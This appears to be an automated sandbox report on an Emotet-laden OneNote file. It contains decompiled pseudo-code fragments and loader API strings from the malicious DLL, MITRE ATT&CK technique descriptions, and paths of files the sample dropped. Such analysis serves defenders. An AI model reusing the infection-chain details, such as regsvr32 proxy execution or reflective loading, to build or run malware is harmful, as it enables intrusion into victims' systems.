				if (_t167 == 0) goto 0x8000e0f8;
				if (_t133 - 1 != 1) goto 0x8000e164;
				r9d = r14d;
				E0000000118000DB34(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DC50(r15d,  *((intOrPtr*)(_t180 + 8)), _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r9d = r14d;
				E0000000118000DA30(_t122, r15d, _t180, _t184,  &_v128, _t208, _t206);
				goto 0x8000e0b0;
				r8d = r14d;
				_v152 = _v152 & _t180;
				_v128 = _t180;
				_v120 = 0;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x8000e150;
				_t116 = GetLastError();
				_v128 = _t116;
				asm("movsd xmm0, [ebp-0x40]");
				asm("movsd [ebp-0x30], xmm0");
				if (_t116 != 0) goto 0x8000e1cc;
				_t117 = _v112;
				if (_t117 == 0) goto 0x8000e1a3;
				if (_t117 != 5) goto 0x8000e193;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 9;
				 *((char*)(_t184 + 0x38)) = 1;
				 *(_t184 + 0x34) = _t117;
				goto 0x8000df3f;
				_t204 = _t184;
				E000000011800086B0(_v112, _t204);
				goto 0x8000df3f;
				if (( *( *((intOrPtr*)(_t204 + _t222 * 8)) + 0x38 + _t223 * 8) & 0x00000040) == 0) goto 0x8000e1b4;
				if ( *_t206 == 0x1a) goto 0x8000e1d3;
				 *(_t184 + 0x34) =  *(_t184 + 0x34) & 0x00000000;
				 *((char*)(_t184 + 0x30)) = 1;
				 *((intOrPtr*)(_t184 + 0x2c)) = 0x1c;
				 *((char*)(_t184 + 0x38)) = 1;
				goto 0x8000df3f;
				goto 0x8000e1d5;
				return 0;
			}

0x18000dee0
0x18000dee0
0x18000def6
0x18000defc
0x18000deff
0x18000df05
0x18000df0e
0x18000df10
0x18000df15
0x18000df18
0x18000df1e
0x18000df25
0x18000df2d
0x18000df30
0x18000df35
0x18000df3a
0x18000df42
0x18000df57
0x18000df5b
0x18000df5f
0x18000df67
0x18000df6c
0x18000df73
0x18000df7c
0x18000df84
0x18000df8b
0x18000df8b
0x18000df8f
0x18000df97
0x18000dfa9
0x18000dfb8
0x18000dfc2
0x18000dfc7
0x18000dfde
0x18000dfe0
0x18000dfe9
0x18000e004
0x18000e00a
0x18000e00e
0x18000e010
0x18000e019
0x18000e01e
0x18000e024
0x18000e028
0x18000e02c
0x18000e032
0x18000e034
0x18000e03f
0x18000e043
0x18000e048
0x18000e04f
0x18000e051
0x18000e055
0x18000e05d
0x18000e071
0x18000e073
0x18000e076
0x18000e083
0x18000e085
0x18000e08d
0x18000e090
0x18000e094
0x18000e099
0x18000e09c
0x18000e0ab
0x18000e0b0
0x18000e0b7
0x18000e0cc
0x18000e0ce
0x18000e0d2
0x18000e0d4
0x18000e0d9
0x18000e0de
0x18000e0e4
0x18000e0f1
0x18000e0f6
0x18000e0f8
0x18000e105
0x18000e10a
0x18000e10c
0x18000e119
0x18000e11e
0x18000e12b
0x18000e12e
0x18000e136
0x18000e13a
0x18000e145
0x18000e147
0x18000e14d
0x18000e153
0x18000e158
0x18000e16e
0x18000e170
0x18000e175
0x18000e17a
0x18000e17c
0x18000e180
0x18000e187
0x18000e18b
0x18000e18e
0x18000e196
0x18000e199
0x18000e19e
0x18000e1ad
0x18000e1b2
0x18000e1b4
0x18000e1b8
0x18000e1bc
0x18000e1c3
0x18000e1c7
0x18000e1d1
0x18000e1e5

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000DFFC
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000000018000DECB), ref: 000000018000E087

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
Instruction ID: 0d257abc0b638f0f040665fb3b769d735b9bc0d803a768daaeded027fae08968
Opcode Fuzzy Hash: 0675eeeead42596f3d7dd2e4aa0abe962e21f79f71d61d7b844ad93efeec3d3b
Instruction Fuzzy Hash: 7291B13261469885F7A2CF6598403ED3BA0F749BC8F14C11AFE4A67A95DF74C68AC710

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000DC50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100
fileCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E0000000118000DC50(signed int __edx, void* __edi, void* __rax, signed long long __rbx, intOrPtr* __rcx, long long __rbp, signed short* __r8, signed long long _a8, signed long long _a16, long long _a24, char _a40, char _a1744, char _a1752, signed int _a5176, void* _a5192) {
				intOrPtr _v0;
				signed long long _v8;
				signed int _t41;
				signed long long _t62;
				short* _t67;
				signed int* _t68;
				void* _t91;
				void* _t97;
				void* _t99;
				void* _t102;
				void* _t103;

				_a8 = __rbx;
				_a24 = __rbp;
				E0000000118000F880(0x1470, __rax, _t97, _t99);
				_t62 =  *0x80021010; // 0xc11a2227b184
				_a5176 = _t62 ^ _t91 - __rax;
				r14d = r9d;
				r10d = r10d & 0x0000003f;
				_t103 = _t102 + __r8;
				 *((long long*)(__rcx)) =  *((intOrPtr*)(0x800227f0 + (__edx >> 6) * 8));
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t103 >= 0) goto 0x8000dd91;
				_t67 =  &_a40;
				if (__r8 - _t103 >= 0) goto 0x8000dcfa;
				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x8000dce6;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E0000000118000A154();
				if (0 == 0) goto 0x8000dd89;
				if (0 == 0) goto 0x8000dd79;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
				if (0 + _a24 < 0) goto 0x8000dd46;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0x8000dcbd;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
			}

0x18000dc50
0x18000dc55
0x18000dc67
0x18000dc6f
0x18000dc79
0x18000dc8a
0x18000dc98
0x18000dc9c
0x18000dcb4
0x18000dcba
0x18000dcbd
0x18000dcc3
0x18000dccb
0x18000dccd
0x18000dcd8
0x18000dcdf
0x18000dce2
0x18000dce6
0x18000dcf8
0x18000dcfa
0x18000dd05
0x18000dd13
0x18000dd26
0x18000dd2b
0x18000dd35
0x18000dd3e
0x18000dd44
0x18000dd46
0x18000dd5b
0x18000dd64
0x18000dd6f
0x18000dd77
0x18000dd7e
0x18000dd84
0x18000dd8f
0x18000ddbf

APIs

WriteFile.KERNEL32 ref: 000000018000DD67
GetLastError.KERNEL32 ref: 000000018000DD89

Strings

U, xrefs: 000000018000DD13

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 0000000180004AA4
RaiseException.KERNEL32 ref: 0000000180004AEA

Strings

csm, xrefs: 0000000180004AD7

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800109D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 0000000180010A22
RegisterClassExW.USER32 ref: 0000000180010A59

Strings

P, xrefs: 00000001800109D9

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: P
API String ID: 1693014935-3110715001
Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 3480, Parent PID: 624COMMON

Execution Graph

Execution Coverage:	17.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	38
Total number of Limit Nodes:	4

Executed Functions

Function 02460000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 02460344
VirtualAlloc.KERNELBASE ref: 0246038A
VirtualAlloc.KERNELBASE ref: 024603A4
VirtualProtect.KERNELBASE ref: 0246085C
RtlAddFunctionTable.KERNEL32 ref: 024608E9

Strings

temI, xrefs: 0246011F
Flus, xrefs: 024600E4
Load, xrefs: 02460095
Virt, xrefs: 024600C5
GetN, xrefs: 02460107
truc, xrefs: 024600F2
ualA, xrefs: 024600B5
Cach, xrefs: 02460100
hIns, xrefs: 024600EB
ualP, xrefs: 024600CD
ddFu, xrefs: 0246013A
Virt, xrefs: 024600AD
tion, xrefs: 024600F9
ct, xrefs: 024600DD
o, xrefs: 0246012E
nf, xrefs: 02460127
Libr, xrefs: 0246009D
rote, xrefs: 024600D5
ativ, xrefs: 0246010F
lloc, xrefs: 024600BD
ncti, xrefs: 02460141
RtlA, xrefs: 02460133
Slee, xrefs: 02460084
onTa, xrefs: 02460148
eSys, xrefs: 02460117
aryA, xrefs: 024600A5

Memory Dump Source

Source File: 00000004.00000002.633090220.0000000002460000.00000040.00001000.00020000.00000000.sdmp, Offset: 02460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2460000_regsvr32.jbxd

Similarity

API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 394283112-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: a7d1023f021b44a55f22f7a7ea9f3a191244592091b62cbab05105eec8a4b8a4
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: BC520530618B488BD719DF18D8897BAB7E1FB84305F14562EE88BC7251DB34E586CB87

Uniqueness

Uniqueness Score: -1.00%

Function 024A40A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE ref: 024A41EB

Strings

Ql, xrefs: 024A411D
v[, xrefs: 024A4152

Memory Dump Source

Source File: 00000004.00000002.633268738.00000000024A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 024A1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_24a1000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID: Ql$v[
API String ID: 2039140958-138011117
Opcode ID: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
Instruction ID: 36ac24a37244a83b367ad98555d6cd7b88619ef443413a2b48907498cafd1efd
Opcode Fuzzy Hash: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
Instruction Fuzzy Hash: 32313A7051CB848BD7B8DF18D48579AB7E1FB88315F60895EE88CC7295CF789888CB42

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Insight_Medical_Publishing.one

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Emotet

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Malware Analysis System Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

C:\Users\user\AppData\Local\Temp\OneNote15WatsonLog.etl

C:\Users\user\AppData\Local\Temp\click.wsf

C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll

C:\Users\user\AppData\Roaming\Microsoft\OneNote\16.0\Preferences.dat

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IOV5D23NX65BBX4TEENK.temp

C:\Windows\System32\CRCPqQPgWxqcgJu\zBLf.dll (copy)

Static File Info

General

Windows Analysis Report
Insight_Medical_Publishing.one

Function 006F0000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953
memoryCOMMON

Function 0074709C Relevance: 11.5, Strings: 9, Instructions: 237
COMMON

Function 0000000180010C10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78
librarymemorynativeCOMMON

Function 00737D6C Relevance: 7.7, Strings: 6, Instructions: 201
COMMON

Function 0074A000 Relevance: 7.7, Strings: 6, Instructions: 154
COMMON

Function 0000000180010AC0 Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Function 0073CC14 Relevance: 4.1, Strings: 3, Instructions: 312
COMMON

Function 00738BC8 Relevance: 4.0, Strings: 3, Instructions: 213
COMMON

Function 00748FC8 Relevance: 1.5, Strings: 1, Instructions: 279
COMMON

Function 000000018000147C Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Function 00000001800063CC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMON

Function 00743988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
processCOMMON

Function 000000018000D26C Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Function 0000000180008714 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Function 0000000180001268 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON